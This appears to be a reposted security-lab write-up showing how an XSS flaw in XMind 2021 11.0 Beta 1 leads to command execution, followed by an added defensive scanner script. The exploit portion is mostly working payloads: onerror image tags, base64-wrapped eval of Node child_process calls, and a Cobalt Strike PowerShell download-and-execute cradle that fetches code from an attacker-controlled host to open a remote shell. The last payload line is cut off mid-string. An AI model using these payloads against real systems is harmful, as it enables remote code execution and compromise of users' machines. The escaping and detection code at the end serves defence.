XMind 2021 11.0 Beta 1: XSS vulnerability leading to command execution


How the vulnerability is exploited:

An event-based XSS is chosen, which requires an element that carries an onerror event, such as img or audio.

Pop-up (alert) code:

<img src=x onerror=alert(1)>


Constructing the command-execution payload

 

require('child_process').exec('ipconfig /all', (error, stdout, stderr) => {
    alert(`stdout: ${stdout}`);
});

 

Final exploit code:

 

<img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>

Reverse shell command

Generate a PowerShell script with CS (Cobalt Strike):

 

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://127.0.0.1/test/'))"
 
require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://127.0.0.1/test\'))"', (error, stdout, stderr) => {
    alert(`stdout: ${stdout}`);
});
 
cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguNzIuMTI5OjgwODEvYWJjZGVcJykpIicsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==
 
<img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXh
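
Added example, not part of the original article: a defender-side check for the pattern shown above. It escapes topic text before it is rendered as HTML and flags inline event handlers and base64-wrapped Node API references. The function names and sample topics are constructed for illustration, and it assumes the application renders topic text as HTML in a context where Node's require is reachable, as the payloads above imply.

```javascript
// Added example: defensive handling of untrusted mind-map topic text.
// escapeHtml, inspectTopic and report are hypothetical names, not XMind APIs.

// Escape the five HTML-significant characters so markup is displayed as text.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// A tag carrying an inline event-handler attribute, e.g. <img ... onerror=...>
const HANDLER_RE = /<[a-z][^>]*\son[a-z]+\s*=/i;
// Quoted runs that look like base64 (the article wraps its payload this way)
const B64_RE = /[`'"]([A-Za-z0-9+/]{16,}={0,2})[`'"]/g;
// Node primitives that turn script execution into command execution
const NODE_RE = /child_process|require\s*\(|process\.binding/;

// Return a list of findings for one topic string (empty list = nothing flagged).
function inspectTopic(text) {
  const findings = [];
  if (HANDLER_RE.test(text)) findings.push('inline-event-handler');
  if (NODE_RE.test(text)) findings.push('node-api-reference');
  for (const m of text.matchAll(B64_RE)) {
    // Decode each candidate and look for the same primitives inside it.
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (NODE_RE.test(decoded)) { findings.push('encoded-node-api-reference'); break; }
  }
  return findings;
}

// Constructed sample topics: one benign, two modelled on the article's examples.
const encoded = Buffer.from("require('child_process').exec('ipconfig /all')").toString('base64');
const SAMPLES = [
  'Q3 roadmap <draft>',
  '<img src=x onerror=alert(1)>',
  "<img src=# onerror='eval(new Buffer(`" + encoded + "`,`base64`).toString())'>",
];

// Inspect every sample and pair the findings with the escaped, render-safe text.
function report() {
  return SAMPLES.map((t) => ({ findings: inspectTopic(t), safeHtml: escapeHtml(t) }));
}

console.log(JSON.stringify(report(), null, 2));
```

Escaping at render time is the fix; the scanner is only a triage aid for files received from others and will miss obfuscation it does not model.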

 


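This article comes from Khan Security Attack and Defense Lab (Khan安全攻防实验室) and is published by congtou with authorization. The views expressed do not represent the position of 华盟网 (Huameng). To reprint, please contact the original author.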
